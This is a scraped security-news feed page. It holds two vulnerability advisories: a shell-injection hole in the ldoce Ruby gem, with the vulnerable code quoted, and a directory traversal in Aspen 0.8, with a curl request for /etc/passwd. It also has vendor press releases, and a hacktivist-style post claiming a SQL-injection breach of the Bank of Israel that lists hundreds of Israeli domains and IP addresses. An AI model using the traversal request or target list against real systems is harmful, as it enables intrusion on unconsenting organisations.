Quantcast
Channel: BOT24
Viewing all 8064 articles
Browse latest View live

Remote command execution in Ruby Gem ldoce 0.0.2

$
0
0
Remote command execution in Ruby Gem ldoce 0.0.2
Larry W. Cashdollar
@_larry0
3/25/2013


http://rubygems.org/gems/ldoce


Ldoce Ruby Gem:

Easily interface with the Longman Dictionary of Contemporary English API from Ruby:

NB currently mac only as it depends on the afplay command.

https://github.com/markburns/ldoce

Ldoce passes an mp3 url to commandline for audio output of the pronunciation of a dictonary word:

If the URL or filename for the mp3 files contain shell metacharacters code can be executed remotely as the client:

[./ldoce-0.0.2/lib/ldoce/word.rb]

     if mp3?
       unless File.exists? filename
         command = "curl #{mp3_url} -silent > {filename}"
         `{command}`
       end
       `afplay #{filename}`
     end




//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

Release of Dragon Sandbox:

$
0
0

Next-Generation APT Intelligence

We are at war. There's no doubt about it.
Highly sophisticated cyber-attacks and cyber-conflicts are happening on a daily basis. Big corporations, news agencies and government agencies all around the world are getting hacked. A new threat is arising, more sophisticated, more resilient and way more scary.
0day vulnerabilities, undetectable malware and stealthy lateral movements make the attackers of 2013 an unprecedented adversary that traditional security products and tactics can't do anything against. Among us experts we commonly define this threat as APT and trust us, there's nothing you can do about it either. At this very moment, they are the number 1 threat to every organization and individual on the in-ter-net, as shown by the following graph:
APT Graph
Coming from our long experience dealing with malware, sandboxing and making your lives easier, we decided to apply our knowledge into a new cutting-edge product that will help you dealing with APT: identify it, block it and disrupt your adversary! As a result, we are thrilled to announce the release of Dragon Sandbox:

SAS Survey Signals Big Data Disconnect; Only 12 Percent Onboard

$
0
0

CARY, N.C.--(BUSINESS WIRE)--Despite industry hype, most organizations have yet to develop and implement a big data strategy. Business analytics leader SAS and SourceMedia surveyed 339 data management professionals about their organizations’ use of data management technology. The results show few organizations taking advantage of product, customer and other data sources.
“Big data or not, data management will help determine which companies thrive and which ones struggle in the years to come”
Just 12 percent of organizations surveyed are currently executing against a big data strategy in daily operations. The most common reasons others are not fully exploiting their big data:
  • 21 percent don’t know enough about big data.
  • 15 percent don’t understand the benefits.
  • 9 percent lack business support.
  • 9 percent lack data quality in existing systems.
For help getting started with big data, read the white paper Big Data, Data Governance and MDM about the business requirements for big data and the questions to ask along the way.
“The 12 percent of organizations that are already planning around big data enjoy a significant competitive advantage,” said Todd Wright, Global Product Marketing Manager for SAS®DataFlux® Data Quality. “SAS customers can harness the full power in their data with a comprehensive approach to information management. Our integrated solutions, tools, methodologies and workflows can enable organizations to manage big data as a valued asset, driving core operational processes and strategic decision making to increase competitive edge.”
Lack of data quality, data governance hinders efforts
Asked about the likelihood that their organizations would use external big data in 2014, just 14 percent of respondents said “very likely,” while 19 percent responded “not likely at all.” Specific concerns included data quality and accuracy, accessing the right data, reconciling disparate data, lack of organizational view into data, timeliness, compliance, and security.
The survey found no real consensus on who owns the data management strategy, with responses ranging from midlevel IT personnel up to the CEO. This confusion likely causes additional challenges in data strategy development and execution.
Atop the data management wish list: data visualization and dashboards, data profiling, SaaS
Most respondents call detailed data analysis a priority for supporting business decisions, along with increased internal reporting and information access. When asked what they want from data solutions, the number one answer was data visualizations and dashboards (73 percent), data profiling (53 percent), and SaaS (44 percent).
Customer and product data top the data types collected by organizations. The types of customer data being collected to make decisions were business-to-consumer (66 percent), end-customer data (59 percent), citizen data (29 percent) and patient data (23 percent). The product data being collected for decision making included selling-side (62 percent), buying-side (61 percent) and MRO (40 percent).
Information management pros make data pay
For additional findings, please download the 2013 Big Data Survey Brief. This online survey was fielded in December 2012 to information management professionals. The 339 respondents were screened for involvement with their organization’s data management tools and processes. The margin of error is +/-5.3 percent at 95 percent confidence level for total sample.
“Big data or not, data management will help determine which companies thrive and which ones struggle in the years to come,” Wright continued. French car center network Feu Vert is one example. With 400 retail outlets in Europe, Over six months, Feu Vert and SAS worked together to create a unique reference data hub using SAS DataFlux Data Management and SAS DataFlux Master Data Management. This project also established a customer data governance program, improved customer data value and qualification, and helped reduce the cost per customer contact. Feu Vert is improving accuracy and quality of customer data as it secures a market leadership position.
About SAS
SAS is the leader in business analytics software and services, and the largest independent vendor in the business intelligence market. Through innovative solutions, SAS helps customers at more than 60,000 sites improve performance and deliver value by making better decisions faster. Since 1976 SAS has been giving customers around the world THE POWER TO KNOW®.
SAS and all other SAS Institute Inc. product or service names are registered trademarks or trademarks of SAS Institute Inc. in the USA and other countries. ® indicates USA registration. Other brand and product names are trademarks of their respective companies. Copyright © 2013 SAS Institute Inc. All rights reserved.

Contacts

SAS
Faye Merrideth, 919-531-4261
Faye.Merrideth@sas.com
www.sas.com/news

Bit9 Free Webcast—How Integrating Server, Endpoint and Network Tools will Improve your Security Posture

$
0
0

Get a Holistic View of Everything Happening Across your Enterprise—in Real Time—without Scanning or Polling
WALTHAM, Mass.--(BUSINESS WIRE)--Bit9, the leader in Trust-based Security, will present the free webcast “Next-Generation Security Solutions: How Integrating Server/Endpoint and Network Tools will Improve Your Security Posture” on Tuesday, April 9, 2013, at 9:00 a.m. and 2:00 p.m. EDT.
“Next-Generation Security Solutions: How Integrating Server/Endpoint and Network Tools will Improve Your Security Posture”
The powerful integration of next-generation network security tools and server/endpoint security solutions will provide security analysts with a holistic view of everything happening across your enterprise—in real time—without scanning or polling.
What: Free live webcast: “Next-Generation Security Solutions: How Integrating Server/Endpoint and Network Tools will Improve Your Security Posture”
Who Should Attend: IT security leaders who are using or contemplating next-generation network security tools and who want seamless integration with the industry-leading endpoint and server security solution
When: Tuesday, April 9, 2013 at 9:00 a.m. and 2:00 p.m. EDT
Webcast attendees will learn how to:
  • Automatically prioritize network alerts based on real-time data about servers and endpoints
  • Determine the scope and root cause of a malware infection
  • Proactively protect your servers and endpoints by banning malware detected on the network
  • Seamlessly send malware detected on your servers and endpoints to network security tools for “detonation” and analysis
About Bit9
The leader in Trust-based Security, Bit9 continuously monitors and records all activity on servers and endpoints to detect and stop cyberthreats that evade traditional security defenses. A cloud-based software reputation service combined with policy-driven application control and whitelisting provide the most reliable form of security in a model that can be rapidly implemented with less maintenance than traditional tools. Bit9 has stopped the most advanced attacks, including Flame, Gauss and the malware responsible for the RSA breach. Almost 1,000 organizations—from Fortune 100 companies to small businesses—use Bit9 to increase security, reduce operational costs, and improve compliance. For more information, visit http://www.bit9.com, follow us on Twitter @Bit9Facebook and Google+, or call +1 617-393-7400.

Contacts

Bit9
Kevin Flanagan, +1 617-393-7421
kflanagan@bit9.com

VirusTotal += Passive DNS replication

$
0
0

Passive DNS replication is a technology which constructs zone replicas without cooperation from zone administrators, based on captured name server responses. The main idea behind passive DNS is as follows:

Inter-server DNS messages are captured by sensors and forwarded to a collection point for analysis.
After being processed, individual DNS records are stored in a database where they can be indexed and queried.
As such, passive DNS can help in answering the following questions:
Where did this domain name point to in the past?
What domain names are hosted by a given nameserver?
What domain names point into a given IP network?
What subdomains exist below a certain domain name?

read more..........http://blog.virustotal.com/2013/04/virustotal-passive-dns-replication.html

Aspen 0.8 - Directory Traversal

$
0
0

Aspen 0.8 - Directory Traversal
Earlier versions are also possibly vulnerable.

INFORMATION

Product: Aspen 0.8
Remote-exploit: yes
Vendor-URL: http://www.zetadev.com/software/aspen/

Discovered by: Daniel Ricardo dos Santos
CVE Request - 15/03/2013
CVE Assign - 18/03/2013
CVE Number - CVE-2013-2619
Vendor notification - 18/03/2013
Vendor reply - No reply
Public disclosure - 01/04/2013

OVERVIEW

Aspen 0.8 is vulnerable to a directory traversal.

INTRODUCTION

Aspen is a Python webserver.
Aspen is framework-agnostic and relies heavily on WSGI.
Aspen is fast enough.

VULNERABILITY DESCRIPTION

The vulnerability happens when directory indexing is turned on (default
configuration in this version) and a user requests, for instance
localhost/../../../../../../../etc/passwd.

The vulnerability may be tested with the following command-line:
curl -v4 http://<server>:<port>/../../../../../../etc/passwd

VERSIONS AFFECTED

Tested with version 0.8 but earlier versions are possibly vulnerable.

SOLUTION

Upgrade to version 0.22 - http://aspen.io/

NOTES

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2013-2619 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

CREDITS

Daniel Ricardo dos Santos
SEC+ Information Security Company - http://www.secplus.com.br/




//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

DIY Java-based RAT (Remote Access Tool) spotted in the wild

$
0
0

While the authors/support teams of some of the market leading Web malware exploitation kits are competing on their way to be the first kit to introduce a new exploit on a mass scale, others, largely influenced by the re-emergence of the DIY (do-it-yourself) trend across the cybercrime ecosystem, continue relying on good old fashioned social engineering attacks.

In this post, I’ll profile a beneath-the-radar type of DIY Java-based botnet building tool, which is served through the usual unsigned, yet malicious Java applet.

read more..........http://blog.webroot.com/2013/04/01/diy-java-based-rat-remote-access-tool-spotted-in-the-wild/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed:+WebrootThreatBlog+(Webroot+Threat+Blog)

www.bankisrael.gov.il/ Bank of Israel #DB Leaked

$
0
0
We show these compromised systems so that you understand the current threat environment that surrounds us everyday and how significant it is to take the appropriate countermeasures to safeguard your critical data no matter what size your organization is as well as your individual data driven devices. Below is POC of the  Exploit. As you can see no entity is immune from such attacks. Again as always be proactive not reactive in safeguarding your critical data and stay safe out there. Subsequently as you are aware this blog is provided to the public to offer education in the area of IT security, creating awareness and increasing collaboration so you can implement the appropriate countermeasures such as those described in ISO13335 to prevent yourselves from becoming victims in the current threat environment,

The Breach is provided below as I will continue to monitor the net to safeguard systems and individuals critical data. Additionally this information is provided to our readers as an addendum to the California Database Security Breach Act. Please do your part in helping to inform those who have been exploited as you would want others to notify you if your critical data had been compromised. Karma!





Target: www.bankisrael.gov.il/ BANK OF ISRAEL
Twitter @LatinHackTeamR LATINHACKTEAM REBORN ATTACKING THE BANKS
Methode: Blind SQL
-------------------------------------------------------------------------------------------
    www.acpr.org.il = 82.80.253.22

    www.acri.org.il = 195.28.180.101

    www.acum.org.il = 192.114.183.50

    www.admin.technion.ac.il = 132.68.9.238

    www.afcon-ind.co.il = 212.199.93.132

    www.afeka.ac.il = 212.199.96.130

    www.agilesparks.co.il = 62.219.11.10

    www.agoda.co.il = 91.206.233.75

    www.agri.gov.il = 192.114.3.10

    www.agri.huji.ac.il = 128.139.13.24

    www.aharai.org.il = 84.95.242.187

    www.akim.org.il = 212.235.25.2

    www.alamo.co.il = 80.70.129.156

    www.alexred.co.il = 80.244.168.25

    www.alitalia.co.il = 80.72.160.100

    www.alljobs.co.il = 194.90.46.104

    www.amcham.co.il = 173.254.28.115

    www.americanexpress.co.il = 199.203.46.4

    www.amutayam.org.il = 62.90.118.141

    www.anet.co.il = 199.83.129.67

    www.antiquities.org.il = 199.203.242.222

    www.antisemitism.org.il = 192.116.71.182

    www.antitrust.gov.il = 62.219.23.242

    www.appliedmaterials.co.il = 212.179.112.145

    www.aqua.org.il = 62.128.59.152

    www.arabcol.ac.il = 194.90.203.107

    www.arabil.co.il = 212.143.64.150

    www.arad.co.il = 82.80.247.35

    www.archive.gov.il = 147.237.72.174

    www.archives.gov.il = 147.237.72.174

    www.archives.org.il = 91.193.51.131

    www.ariel.ac.il = 62.219.17.242

    www.articles.co.il = 207.58.186.196

    www.arzenu.org.il = 208.82.16.68

    www.asa.ac.il = 82.80.213.20

    www.asat.org.il = 62.90.157.28

    www.ash-college.ac.il = 195.95.183.238

    www.ashdodport.co.il = 212.179.113.96

    www.ashdodport.org.il = 212.179.113.96

    www.askimo.co.il = 176.34.115.41

    www.astronomy.org.il = 74.119.146.200

    www.atlas.co.il = 82.80.225.234

    www.aurora-israel.co.il = 80.179.130.154

    www.auto.co.il = 192.117.187.238

    www.aviv.kotar.co.il = 62.219.59.138

    www.avni.org.il = 82.80.211.78

    www.avonlea.co.il = 174.120.146.194

    www.b144.co.il = 147.235.237.17

    www.babylonjewry.org.il = 207.57.30.88

    www.bac.org.il = 91.228.127.162

    www.bankisrael.gov.il = 147.237.76.101

    www.bankjerusalem.co.il = 194.90.247.121

    www.bcommunications.co.il = 213.8.144.120

    www.bdicode.co.il = 212.25.88.91

    www.beeri.org.il = 62.219.13.240

    www.beitar-jerusalem.org.il = 206.212.247.130

    www.beitgamliel.org.il = 62.90.141.80

    www.beitissie.org.il = 62.90.118.216

    www.betar.org.il = 62.219.69.107

    www.beytenu.org.il = 212.235.100.54

    www.bezalel.ac.il = 192.114.70.67

    www.bgu.ac.il = 132.72.138.38

    www.bh.org.il = 62.219.78.68

    www.bina.org.il = 194.213.4.10

    www.binyamin.org.il = 62.90.118.216

    www.bioforum.org.il = 213.8.27.14

    www.biographychannel.co.il = 113.197.35.127

    www.biojerusalem.org.il = 80.244.168.43

    www.bis.org.il = 82.80.223.73

    www.biu.ac.il = 132.70.61.50

    www.bizniz.co.il = 213.8.146.30

    www.bizportal.co.il = 192.118.97.45

    www.blinds.org.il = 109.226.34.82

    www.bloger.co.il = 62.219.1.26

    www.blogmorim.org.il = 62.219.14.114

    www.bm.technion.ac.il = 132.68.176.10

    www.bneiakiva.org.il = 173.239.32.204

    www.boi.gov.il = 147.237.76.101

    www.boi.org.il = 147.237.76.101

    www.bookgallery.co.il = 213.8.152.162

    www.bookmarkthis.co.il = 66.40.52.11

    www.bookshop.co.il = 178.63.66.12

    www.bordo100.co.il = 195.28.180.112

    www.botanika.co.il = 76.162.9.165

    www.boyfriend.co.il = 173.194.67.121

    www.breakingthesilence.org.il = 85.92.75.22

    www.brener.org.il = 212.199.206.127

    www.breslev.co.il = 212.235.57.49

    www.briga.co.il = 212.199.177.137

    www.bsf.org.il = 82.80.240.230

    www.bsmart.co.il = 62.90.157.20

    www.btl.gov.il = 80.179.74.75

    www.bug.co.il = 72.232.198.203

    www.bus.co.il = 81.218.231.98

    www.bus.gov.il = 80.178.251.96

    www.calcalist.co.il = 80.239.171.147

    www.cal.co.il = 62.128.57.180

    www.callkav.gov.il = 80.178.251.96

    www.camoni.co.il = 84.95.242.55

    www.camtek.co.il = 96.31.35.72

    www.car2go.co.il = 192.116.71.42

    www.carta.co.il = 173.231.146.71

    www.cblslaw.co.il = 213.8.154.196

    www.cbs.gov.il = 147.237.248.50

    www.cdi.co.il = 213.8.86.129

    www.cd-log.co.il = 62.219.78.124

    www.chabadjerusalem.org.il = 64.90.177.117

    www.chamber.org.il = 212.150.186.74

    www.charts.co.il = 212.150.53.118

    www.chess.org.il = 82.166.34.138

    www.cinephil.co.il = 62.90.118.189

    www.city4u.co.il = 147.236.237.123

    www.civics.org.il = 62.219.59.149

    www.civil-service.gov.il = 147.237.72.96

    www.cjaed.org.il = 82.166.151.88

    www.cji.co.il = 108.179.201.122

    www.claimscon.co.il = 62.90.102.103

    www.clfb.org.il = 194.90.130.243

    www.clutch.co.il = 62.128.52.191

    www.cognitionicore.org.il = 132.76.150.57

    www.colman.ac.il = 82.166.60.130

    www.col.org.il = 199.203.51.124

    www.commstock.co.il = 82.80.247.30

    www.consuls.co.il = 80.179.226.18

    www.consumers.org.il = 82.166.192.55

    www.copyright.co.il = 193.105.99.210

    www.cs.bgu.ac.il = 132.72.41.239

    www.cse.huji.ac.il = 132.65.16.18

    www.cs.haifa.ac.il = 132.74.120.2

    www.cs.huji.ac.il = 132.65.16.18

    www.cs.tau.ac.il = 132.67.252.237

    www.cs.technion.ac.il = 132.68.32.15

    www.cwv.gov.il = 147.237.76.94

    www.daatemet.org.il = 216.119.121.110

    www.dailymaily.co.il = 213.8.172.123

    www.dam.org.il = 82.80.209.42

    www.dan.co.il = 194.90.203.29

    www.danielbensimon.org.il = 212.29.201.155

    www.darom.gov.il = 147.237.77.71

    www.database2011.co.il = 69.163.168.229

    www.dat.gov.il = 213.8.142.72

    www.davidisaacs.co.il = 66.147.244.106

    www.daynews.co.il = 62.90.141.65

    www.d.co.il = 212.117.156.55

    www.delcam.co.il = 91.231.145.79

    www.deshe.org.il = 82.166.151.63

    www.devils.co.il = 92.61.150.149

    www.dewan.co.il = 199.203.51.80

    www.dic.co.il = 212.143.213.204

    www.discountbank.co.il = 212.179.153.200

    www.diving.org.il = 62.90.141.80

    www.dkatom.co.il = 62.219.67.12

    www.dmh.org.il = 194.90.203.78

    www.docaviv.co.il = 62.219.17.210

    www.docor.co.il = 194.90.8.20

    www.docs.co.il = 64.4.6.100

    www.doctor.co.il = 62.90.240.154

    www.dorot.co.il = 62.90.118.148

    www.drc.org.il = 94.103.100.121

    www.drupal.org.il = 109.74.205.200

    www.drushim.co.il = 82.166.7.225

    www.dunav.org.il = 206.214.66.2

    www.d-vision.co.il = 199.203.55.209

    www.dvision.co.il = 91.193.50.61

    www.dwcpa.co.il = 74.220.207.105

    www.dyellin.ac.il = 192.115.88.21

    www.eadventure.co.il = 212.150.186.127

    www.ebaghigh.cet.ac.il = 62.219.59.149

    www.eca.gov.il = 147.237.77.230

    www.econ.bgu.ac.il = 132.72.154.30

    www.educational.co.il = 82.80.221.158

    www.education.gov.il = 81.218.97.84

    www.ee.bgu.ac.il = 132.72.55.45

    www.ef.huji.ac.il = 132.64.128.134

    www.efrata.ac.il = 192.115.100.137

    www.egged.co.il = 194.90.224.185

    www.e-good.org.il = 194.90.203.26

    www.eilon.org.il = 62.219.7.54

    www.eilot.org.il = 192.114.123.130

    www.elalva.co.il = 178.79.168.124

    www.eldav.co.il = 80.244.168.11

    www.elem.org.il = 192.114.70.42

    www.ellayoga.co.il = 194.90.176.85

    www.elul.org.il = 212.143.218.45

    www.e-mago.co.il = 199.83.129.122

    www.emunah.org.il = 62.90.157.51

    www.enco.co.il = 65.99.201.5

    www.engel.co.il = 62.219.78.114

    www.english.imjnet.org.il = 62.90.157.110

    www.eng.tau.ac.il = 132.66.49.20

    www.ent.org.il = 62.90.134.178

    www.environment.gov.il = 147.237.72.129

    www.environment.tau.ac.il = 132.66.252.130

    www-e.openu.ac.il = 147.233.250.224

    www.epochtimes.co.il = 62.219.11.10

    www.eran.org.il = 82.166.151.27

    www.etgar.org.il = 81.218.230.244

    www.euraxess.gov.il = 82.102.134.201

    www.eurocom.co.il = 192.117.172.22

    www.europebgu.org.il = 184.172.171.65

    www.evenyehuda.org.il = 62.90.225.94

    www.exlibris.co.il = 212.179.57.153

    www.exportctrl.mod.gov.il = 195.160.241.221

    www.export.gov.il = 62.128.39.219

    www.ezra.org.il = 72.232.198.202

    www.falunnews.org.il = 50.22.11.32

    www.familymed.org.il = 62.90.134.178

    www.fbmc.co.il = 213.8.27.15

    www.feeder.co.il = 80.70.128.63

    www.fifaclub.co.il = 81.218.230.3

    www.finance.gov.il = 147.237.72.111

    www.financeisrael.mof.gov.il = 147.237.72.153

    www.fine.co.il = 82.166.190.190

    www.forbes.co.il = 194.90.203.30

    www.franchise.org.il = 62.90.118.148

    www.freeones.co.il = 64.188.53.101

    www.fresh.co.il = 82.80.248.160

    www.friendshipvillage.org.il = 64.34.175.158

    www.fxp.co.il = 84.95.234.173

    www.gabrielirubin.co.il = 67.23.241.33

    www.gadgety.co.il = 62.128.59.125

    www.galileemusic.org.il = 64.90.43.151

    www.galilole.org.il = 195.28.181.49

    www.galim.org.il = 132.64.3.17

    www.gamba1.cet.ac.il = 62.219.59.149

    www.gat.org.il = 62.219.13.240

    www.gavison-medan.org.il = 199.203.180.231

    www.geobiology.co.il = 65.254.231.140

    www.gertnerinst.org.il = 212.199.206.127

    www.gga.org.il = 176.34.189.20

    www.ghrm.co.il = 174.120.19.251

    www.girit.co.il = 194.213.4.245

    www.globes.co.il = 80.70.128.51

    www.go4it.org.il = 195.28.180.166

    www.goisrael.co.il = 198.66.229.169

    www.goisrael.gov.il = 62.90.75.68

    www.golan.org.il = 80.179.144.187

    www.goldcarpet.co.il = 82.80.206.3

    www.gondabrain.biu.ac.il = 132.70.61.50

    www.gordon.ac.il = 194.90.203.124

    www.gorman-realestate.co.il = 62.90.247.59

    www.gov.il = 147.237.72.69

    www.gplanet.co.il = 213.8.193.230

    www.graduate.technion.ac.il = 132.68.9.237

    www.grandadvance.co.il = 81.199.116.107

    www.grandunifiedtheory.org.il = 69.163.184.162

    www.green-party.co.il = 208.109.78.137

    www.gretztlv.org.il = 83.170.118.159

    www.grid.org.il = 94.127.76.190

    www.groupon.co.il = 91.108.184.84

    www.gsi.gov.il = 62.90.118.247

    www.guides.gov.il = 147.237.72.69

    www.guidestar.org.il = 212.150.158.242

    www.guitara.co.il = 69.163.228.169

    www.haalon-yavne.org.il = 82.80.209.42

    www.haaretz.co.il = 94.127.76.80

    www.hacking.org.il = 149.126.72.212

    www.hackphone.co.il = 50.87.120.153

    www.hadashot-esi.org.il = 199.203.242.223

    www.hadassah.org.il = 194.110.249.5

    www.hagadagan.co.il = 66.96.200.42

    www.haifa.ac.il = 132.74.1.221

    www.haifaff.co.il = 80.179.226.18

    www.haifa.gov.il = 194.90.8.80

    www.haifahillel.org.il = 81.218.71.214

    www.hakolbo.org.il = 91.202.171.230

    www.hamakor.org.il = 82.166.80.233

    www.hammersite.co.il = 216.128.21.98

    www.hartuv.edu1.org.il = 212.179.114.226

    www.hasbara.gov.il = 147.237.77.142

    www.hasdera.org.il = 62.128.52.66

    www.hasifria.org.il = 62.128.39.217

    www.hatachana.co.il = 195.28.181.104

    www.havana.org.il = 82.80.223.172

    www.haverim.org.il = 212.150.10.242

    www.hayadan.org.il = 82.166.80.235

    www.haza.co.il = 62.219.17.174

    www.hbl.co.il = 82.80.247.30

    www.hbmi.co.il = 192.117.172.20

    www.hcinema.org.il = 80.179.140.5

    www.health.gov.il = 147.237.77.238

    www.hefer.org.il = 62.90.157.10

    www.hemda.org.il = 194.90.203.25

    www.hertzog.org.il = 212.179.58.15

    www.herzliyamuseum.co.il = 212.179.114.211

    www.heskem.org.il = 192.117.172.25

    www.hevratova.org.il = 62.90.118.216

    www.hicenter.co.il = 212.143.17.169

    www.histadrut.org.il = 82.80.237.105

    www.holesinthenet.co.il = 82.166.234.103

    www.holonindustry.org.il = 62.90.225.94

    www.hot.org.il = 199.203.55.209

    www.huji.ac.il = 132.64.3.20

    www.hujihillel.org.il = 81.218.71.214

    www.humanrights.cet.ac.il = 62.219.59.149

    www.humor.co.il = 63.247.90.78

    www.iaa.gov.il = 62.90.90.129

    www.iaec.gov.il = 147.237.77.184

    www.iaf.org.il = 82.80.222.86

    www.iai.co.il = 94.245.70.76

    www.iamc.chemistry.org.il = 195.28.181.77

    www.iaroc.org.il = 216.172.179.168

    www.ib2b.co.il = 213.8.172.43

    www.iballet.co.il = 80.179.226.18

    www.iba.org.il = 212.143.64.150

    www.ibi.co.il = 192.116.247.172

    www.icba.org.il = 212.116.170.214

    www.icb.org.il = 173.245.60.126

    wwwi.colman.ac.il = 193.106.54.57

    www.iconfestival.org.il = 173.236.140.224

    www.icon.org.il = 74.50.54.70

    www.icrcilot.glf.co.il = 195.190.23.135

    www.ida.org.il = 192.115.76.44

    www.idb.co.il = 212.143.213.204

    www.idi.org.il = 212.29.205.74

    www.ifi.org.il = 75.119.215.172

    www.igudbit.org.il = 82.166.151.96

    www.igy.org.il = 182.54.236.17

    www.ihaklai.org.il = 212.143.213.128

    www.ikc.org.il = 212.150.186.35

    www.imaginet.co.il = 88.208.252.130

    www.ima.org.il = 80.179.130.106

    www.imatter.org.il = 195.190.23.94

    www.imi.org.il = 212.143.6.38

    www.imj.org.il = 212.150.186.59

    www.imra.org.il = 208.85.173.43

    www.ims.gov.il = 147.237.72.157

    www.imti.org.il = 62.219.25.129

    www.imu.org.il = 132.68.115.2

    www.imw.org.il = 64.29.151.221

    www.inbar.org.il = 62.90.225.109

    www.incubators.org.il = 199.203.207.195

    www.indembassy.co.il = 82.80.247.30

    www.industry.org.il = 62.90.118.203

    www.inhasharon.co.il = 206.123.101.234

    www.in-hebrew.co.il = 108.179.201.122

    www.inkf.org.il = 62.219.12.179

    www.inn.co.il = 94.127.76.90

    www.innernet.org.il = 208.85.173.43

    www.inss.org.il = 23.23.111.126

    www.intelligence.org.il = 62.219.59.138

    www.intersystems.co.il = 216.183.181.59

    www.investinisrael.gov.il = 199.203.209.210

    www.ippforums.co.il = 212.150.130.251

    www.ipts.org.il = 62.90.225.118

    www.irgun-hamorim.org.il = 212.179.58.242

    www.iris.org.il = 74.53.231.66

    www.ironit.org.il = 212.199.114.30

    www.isas.co.il = 205.234.201.62

    www.isees.org.il = 212.179.40.112

    www.iserd.org.il = 91.143.232.241

    www.ise.technion.ac.il = 212.143.6.68

    www.ishitech.co.il = 38.113.1.161

    www.ish.org.il = 212.235.101.104

    www.islandsuites.co.il = 62.219.23.18

    www.isnh.org.il = 212.235.101.104

    www.isoc.org.il = 192.115.211.11

    www.israelalbum.org.il = 212.179.43.180

    www.israelgateway.co.il = 212.29.236.24

    www.israelidesign.co.il = 62.128.51.41

    www.israelidiamond.co.il = 212.25.72.183

    www.israelnow.co.il = 204.236.173.243

    www.israelpost.co.il = 193.46.64.211

    www.israel-surgery.org.il = 212.235.101.104

    www.israeltoday.co.il = 109.226.11.240

    www.israelunderfire.gov.il = 147.237.76.32

    www.israelweather.co.il = 212.235.12.183

    www.isragift.co.il = 54.247.181.80

    www.israhockey.co.il = 66.40.65.7

    www.israscan.co.il = 199.203.20.149

    www.issa.org.il = 212.150.51.130

    www.issta.co.il = 194.90.73.33

    www.itga.org.il = 212.150.52.122

    www.ittn.org.il = 62.219.14.148

    www.itu.org.il = 62.90.225.121

    www.iturank8.co.il = 199.203.207.195

    www.iucc.ac.il = 128.139.202.17

    www.iula.org.il = 147.236.237.96

    www.iva.org.il = 91.228.127.79

    www.ivolunteer.org.il = 62.90.118.140

    www.jafi.org.il = 194.90.65.227

    www.jamd.ac.il = 62.0.66.54

    www.jcs.co.il = 192.117.127.238

    www.jec.co.il = 80.70.129.181

    www.jennysu.co.il = 173.203.204.123

    www.jer-cin.org.il = 212.143.143.92

    www.jerusalemofgold.co.il = 199.238.153.68

    www.jewishdictionary.co.il = 184.173.9.209

    www.jewishhistory.org.il = 69.27.46.42

    www.jij.org.il = 184.172.2.160

    www.jnul.huji.ac.il = 132.64.3.72

    www.jobspace.co.il = 198.61.157.187

    www.jointnet.org.il = 199.203.176.58

    www.joomla.org.il = 80.179.151.20

    www.jpost.co.il = 192.114.68.62

    www.justice.gov.il = 147.237.72.56

    www.kab.co.il = 62.219.8.115

    www.kadima.org.il = 192.115.31.75

    www.kadoorie.org.il = 212.117.145.54

    www.kalia.org.il = 199.203.55.218

    www.kamtek.co.il = 5.153.11.177

    www.kaye.ac.il = 192.115.100.129

    www.kazakhemb.org.il = 62.90.118.210

    www.kdati.org.il = 62.219.13.240

    www.kehila1.org.il = 82.80.229.146

    www.kenafayim.org.il = 64.245.136.150

    www.kerensite.co.il = 67.210.101.194

    www.kesef.org.il = 194.90.203.4

    www.keshetisrael.co.il = 174.121.79.37

    www.kibbutz.org.il = 62.219.13.240

    www.kibush.co.il = 82.80.254.162

    www.kidstv.co.il = 212.150.44.115

    www.kikarhashabat.co.il = 80.179.74.69

    www.kinderland.co.il = 82.166.246.46

    www.kipa.co.il = 216.130.185.230

    www.kiryatgatim.co.il = 62.90.102.114

    www.kister.huji.ac.il = 132.64.178.195

    www.kkl.org.il = 192.114.182.153

    www.klitamutzlahat.org.il = 80.244.168.3

    www.k-m.org.il = 81.218.125.64

    www.knesset.gov.il = 212.235.5.230

    www.kolech.org.il = 69.42.90.132

    www.koor.co.il = 62.219.84.229

    www.kotar.co.il = 62.219.59.149

    www.kpa.co.il = 212.150.136.84

    www.kranoth.gov.il = 62.0.44.15

    www.ktv.org.il = 62.90.225.109

    www.kvrt.co.il = 62.219.67.50

    www.labor.org.il = 194.0.252.80

    www.labotal.co.il = 62.90.141.43

    www.la-briut.org.il = 199.203.180.231

    www.lacikam.co.il = 91.193.50.61

    www.ladpc.gov.il = 147.236.237.96

    www.lahat.co.il = 80.179.140.137

    www.lak.co.il = 81.218.117.101

    www.lawforums.co.il = 213.8.141.211

    www.lawguide.co.il = 192.116.71.157

    www.law.tau.ac.il = 132.66.252.134

    www.lehi.org.il = 91.198.129.74

    www.letlive.org.il = 62.219.11.10

    www.leumi.co.il = 199.203.32.39

    www.leumi.org.il = 62.219.67.10

    www.liga.co.il = 81.218.249.12

    www.likud.org.il = 141.101.126.159

    www.lindenberg.co.il = 81.218.229.243

    www.lishma.org.il = 80.179.230.60

    www.livluv.org.il = 62.90.225.72

    www.local.co.il = 81.218.219.20

    www.logtel.tempurl.co.il = 212.199.184.221

    www.maabarot.org.il = 82.80.235.59

    www.maale.org.il = 213.151.33.61

    www.maalot.co.il = 212.179.115.166

    www.maccabi-tlv.co.il = 176.34.98.235

    www.machar.org.il = 212.179.112.60

    www.machat.co.il = 108.179.201.122

    www.machon-adler.co.il = 80.179.242.244

    www.machonmeir.org.il = 82.80.198.104

    www.mad.co.il = 75.30.117.139

    www.made.co.il = 80.179.242.244

    www.madeinisrael.gov.il = 199.203.209.211

    www.magazin.org.il = 82.80.254.162

    www.magna.isa.gov.il = 212.68.130.202

    www.ma.huji.ac.il = 132.64.72.10

    www.mako.co.il = 184.169.79.15

    www.makshivim.org.il = 69.42.90.132

    www.maltar.org.il = 194.90.30.181

    www.mamanet.org.il = 174.120.97.163

    www.mantis.co.il = 62.219.78.122

    www.mapi.gov.il = 147.237.77.149

    www.masaisrael.org.il = 212.29.236.29

    www.maskit.co.il = 62.219.17.212

    www.matan.org.il = 69.42.90.133

    www.mateh-fmf.org.il = 195.28.181.222

    www.math.bgu.ac.il = 132.72.41.238

    www.math.tau.ac.il = 132.66.102.122

